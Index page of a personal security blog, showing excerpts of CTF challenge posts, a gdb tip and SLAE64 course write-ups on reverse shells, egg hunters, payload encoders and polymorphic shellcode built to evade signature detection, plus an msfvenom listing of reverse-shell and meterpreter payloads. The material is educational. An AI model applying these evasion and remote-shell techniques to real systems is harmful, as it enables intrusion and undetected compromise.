Codehead's Corner
Random ramblings on hacking, coding, fighting with infrastructure and general tech
Posted: 19 Feb 2018 by Codehead
3 minute read

Problem

Easy and Peasy

nc 35.200.197.38 8003

Europe: nc 35.205.196.143 8003

Like many of the EvlzCTF challenges, this one was a little light on detail, but fun to complete.


Categories: Hacking CTF
Posted: 28 Jan 2018 by Codehead
2 minute read

Problem

Description: this chall sucks, you should watch VIE vs UZB match. :)
VIET NAM VO DICH!
Author: kad96
Website: Link

Visiting the website gave me a blank page. There had to be something more hidden here.


Categories: Hacking CTF
Posted: 23 Jan 2018 by Codehead
2 minute read

Challenge

Aalekh joined IIIT in 2014. Soon, he started selling T-shirts and hoodies. One day, Aalekh got a big order and trusted his childhood friend to handle the order. But his friend betrayed him and sold bad pieces. College students got angry and tried to beat Aalekh up. His good friend, Anshul, wanted to save him. To prevent Aalekh from going under loss, he has to sell 500 T-shirts on the market, the only condition being, customers have to be unique.

Can you help Anshul sell 500 T-shirts?

https://felicity.iiit.ac.in/contest/breakin/questions/uuid/

Flag Format: BREAKIN{[0-9A-Za-z_]+}


Categories: Hacking CTF
Posted: 13 Jan 2018 by Codehead
5 minute read

TL:DR

Command Files allow you to start up gdb in a way that saves you typing the same commands over and over, even doing some of the ‘driving’ for you. I’m not suggesting that this is the best way to use gdb but I found it really helpful and I saved a bunch of time. I’m blogging it for my own reference and to help others find a lesser known, but very useful feature of the tool.

Background

While working on the SLAE64 course assessments, I found myself jumping in and out of gdb a lot. Constantly rebuilding and refining my shellcode test binaries meant that I ended up in constant cycle of doing a whole heap of setup in gdb to get things the way I wanted them, only to spend a few seconds debugging the target, then quitting, tweaking the code, rebuilding and repeating the whole process again.

I’m not a great typist, but I keyed in this sequence so many times that I could probably do it in my sleep:

layout asm
layout reg
break _start
run

There has to be a better way.


Categories: linux assembler hacking
Posted: 28 Nov 2017 by Codehead
12 minute read

After completing the video lectures of the Security Tube Linux 64 bit Assembler Expert course (SLAE64), a series of assessments must be completed to gain certification. This is the seventh and final assignment; build a payload encrypter/decrypter.

We have used payload encoders in previous assignments, but this time we will build a hidden payload that requires a key to decrypt.

The choice of encryption method is left to the student and I spent a good while looking at the various encryption methods:

  • AES - A modern and widely used block cipher scheme. Very complex to implement and would probably require a 3rd party library, making the assignment pretty pointless.
  • RC4 - A fast and relatively easy to implement stream cipher. Unfortunately, Vivek used RC4 in his demo, I didn’t want to repeat his work.
  • FISH, Scream, MUGI, etc - Complex, limited implementation documentation (my maths isn’t up to scratch).

While researching these schemes I stumbled onto some of the more classical cryptography schemes.

While modern crypto schemes produce streams or blocks of pseudo-random noise which is generally XORed against the cleartext, classical ciphers tended to use relocation or shifting of characters. Simple rotational schemes such as Caesar’s cipher or ROT13 barely qualify as encryption, the encoding operation is either fixed or easily brute forced. However, a Substitution Cipher requires a mapping table and this can be varied, forming a kind of key, although a large and cumbersome one.

The Vigenère cipher is a hybrid of substitution and rotation using a table built on an ascending rotation factor. However, it also makes use of a variable length key and so it is suitable for our needs.


Posted: 24 Nov 2017 by Codehead
11 minute read

After completing the video lectures of the Security Tube Linux 64 bit Assembler Expert course (SLAE64), a series of assessments must be completed to gain certification. This is the sixth assignment; take three x64 payloads from ShellStorm and create new, polymorphic versions which have the same functionality.

While this sounds super cool, what we’re actually doing is simply changing the content of the shellcode to try to evade detection by basic security tools that use signature based matching to recognise threats. A limitation of the assignment is to stay within 150% of the original payload size.


Posted: 22 Nov 2017 by Codehead
18 minute read

After completing the video lectures of the Security Tube Linux 64 bit Assembler Expert course (SLAE64), a series of assessments must be completed to gain certification. This is the fifth assignment; analyse 3 payloads generated by the Metasploit msfvenom tool.

msfvenom is a replacement for msfpayload and msfencode tools. It combines their functionality into a single application. The available payloads specifically for x64 Linux are quite limited:

root@kali:~# msfvenom -l | grep linux/x64

linux/x64/exec                                      Execute an arbitrary command
linux/x64/meterpreter/bind_tcp                      Inject the mettle server payload (staged). Listen for a connection
linux/x64/meterpreter/reverse_tcp                   Inject the mettle server payload (staged). Connect back to the attacker
linux/x64/meterpreter_reverse_http                  Run the Meterpreter / Mettle server payload (stageless)
linux/x64/meterpreter_reverse_https                 Run the Meterpreter / Mettle server payload (stageless)
linux/x64/meterpreter_reverse_tcp                   Run the Meterpreter / Mettle server payload (stageless)
linux/x64/shell/bind_tcp                            Spawn a command shell (staged). Listen for a connection
linux/x64/shell/reverse_tcp                         Spawn a command shell (staged). Connect back to the attacker
linux/x64/shell_bind_tcp                            Listen for a connection and spawn a command shell
linux/x64/shell_bind_tcp_random_port                Listen for a connection in a random port and spawn a command shell. 
                                                    Use nmap to discover the open port: 'nmap -sS target -p-'.
linux/x64/shell_find_port                           Spawn a shell on an established connection
linux/x64/shell_reverse_tcp                         Connect back to attacker and spawn a command shell

Posted: 9 Nov 2017 by Codehead
7 minute read

After completing the video lectures of the Security Tube Linux 64 bit Assembler Expert course (SLAE64), a series of assessments must be completed to gain certification. This is the forth assignment; create a custom encoder/decoder to disguise a shellcode payload.

Many security and threat monitoring tools rely on signature matching to identify bad code. A good way to avoid signature based detection is to obscure the content of a payload with encryption or encoding. The same payload can be repeatedly disguised with different obfuscation schemes. Creating a new encoding method is much simpler than building a new payload.

For the assignment, we will design a simple encoding scheme, create an encoding script to disguise our shellcode and write a decoder stub which we will deploy with the payload to rebuild the original code on the fly.


Categories: SLAE64 Assembler Shellcode
Posted: 6 Nov 2017 by Codehead
10 minute read

After completing the video lectures of the Security Tube Linux 64 bit Assembler Expert course (SLAE64), a series of assessments must be completed to gain certification. This is the third assignment; research and create an egg hunter proof of concept.

Egg hunting is a technique which can be used to solve shellcode space restriction problems. The egg hunter is a very small piece of code that searches the process memory for an ‘egg’; a signature consisting of a known sequence of bytes. This signature is used to mark the start of the real payload, which could be much larger. Once the signature is located, the instruction pointer is redirected to the new location and the larger payload is executed.


Categories: SLAE64 Assembler Shellcode
Posted: 27 Oct 2017 by Codehead
12 minute read

After completing the video lectures of the Security Tube Linux 64 bit Assembler Expert course (SLAE64), a series of assessments must be completed to gain certification. This write up is for the second assignment: Create a shellcode string that will start a TCP Reverse Shell.

A reverse shell connects to a remote host on a given network address and port. Any commands issued by the remote host are relayed to a local shell on the target in the same way as the bind shell.

image

Having the target reach out to the remote machine may seem like an odd way of making the connection, especially as the remote must be ready and listening for the connection to be successful. However, this type of connection is preferable if the target is behind a firewall or a network address translation (NAT) layer which would make an inbound connection to a bind shell difficult.

As with the bind shell a passphrase must be implemented to add a layer of security to the program.


Categories: SLAE64 Assembler Shellcode
Site powered by Hugo.
Polymer theme by pdevty, tweaked by Codehead